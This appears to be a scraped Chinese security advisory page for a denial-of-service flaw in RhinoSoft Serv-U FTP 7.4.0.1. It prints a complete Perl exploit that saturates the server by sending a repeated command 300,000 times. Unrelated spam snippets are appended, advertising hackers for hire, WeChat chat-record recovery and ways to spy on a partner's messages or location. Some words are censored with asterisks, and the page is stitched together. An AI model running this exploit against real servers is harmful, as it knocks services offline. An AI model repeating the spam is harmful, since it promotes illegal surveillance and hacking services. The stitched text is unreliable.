影响版本:
RhinoSoft Serv-U 7.4.0.1
漏洞描述:
BUGTRAQ ID: 34127
Serv-U FTP是一款FTP服务程序。
如果远程攻击者向Serv-U FTP服务器发送特制 *** NT请求的话,就可以导致服务器停止响应。<*参考
Jonathan Salwan (submit@shell-storm.org)
*>
SEBUG安全建议:
厂商补丁:
RhinoSoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.serv-u.com/
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
#!/usr/bin/perl
# Soft : FTP Serv-U
# Version : v7.4.0.1
#
# Denial of Service in Serv-u up to 7.4.0.1 (no crash)
# Just the server is saturated, it stops responding.
#
# Author: Jonathan Salwan
# Mail: submit [AT] shell-storm.org
# Web: http://www.shell-storm.org
use IO::Socket;
print "[+] Author : Jonathan Salwan \n";
print "[+] Soft: FTP Serv-U\n";
if (@ARGV < 3)
{
print "[*] Usage: <serv-u.pl> <host> <port>\n";
print "[*] Exemple: serv-u.pl 127.0.0.1 21 jonathan toto\n";
exit;
}
$ip = $ARGV[0];
$port = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "\n[-] Connecting: Failed!\n";
print "\n[+] Connecting: Ok!\n";
print "[+] Sending request...\n";
$evil = " *** NT\r\n" x 300000;
$after = "\x2A\x2A";
print $socket "USER $user\r\n";
print $socket "PASS $pass.$after\r\n";
print $socket "$evil";
sleep(1);
close($socket);
print "[+]Done! the server is saturated.\n";
现在微信和以往的微信差距还是很大的,尤其是很多人用在这个微信上进行销售环节的确是非常棒的一个重要的推广平台。这个微信也是基于微信公众号的二次开发,它可以完美的和微信各式各样的功能进行合理对接,可以通过...
微信聊天记录恢复代码,找回微信聊天记录-免费接单黑客QQ 今年以来,百度出现一些比如:卖吧、魏则西的事件,一时间把百度推了向风尖浪口。很多用户甚至对百度产生了质疑,自从魏则西时间出现后,很多吃瓜群众...
微信怎么查看微信好友位置,微信查看微信好友这种问题我们最好不要去了解,因为相关法律规定是不能够实现的。 1、其实想要查看自己好友的微信位置,我们一般微信之上有现实好友和网友两种区别,所以想要查询...
找黑客一般费用是多少_淘宝找黑客暗语 印度最大在线教育平台发生大规模数据泄露,即日,印度非常大的在线教诲领域Unacademy认可了一路数据泄漏事务,泄漏了大概1100万用户的片面细致消息。事发前,...
很多女孩在恋爱时总是认为爱是最重要的,所以她们会不断降低对自己的爱的态度。 女生在恋爱的时候不要轻易做这几件事 1.降低态度的最重要的形式是试图取悦他们喜欢的男人和他的家人 2.但事实上,这样的...
男朋友和别人的微信聊天记录能查吗 怎么才能查询女朋友的微信聊天 2月7日发布的10.14.3版本Mac系统中的隐私保护漏洞,可能允许潜在的攻击者绕过保护机制直接访问存储在所有macOS Mojave...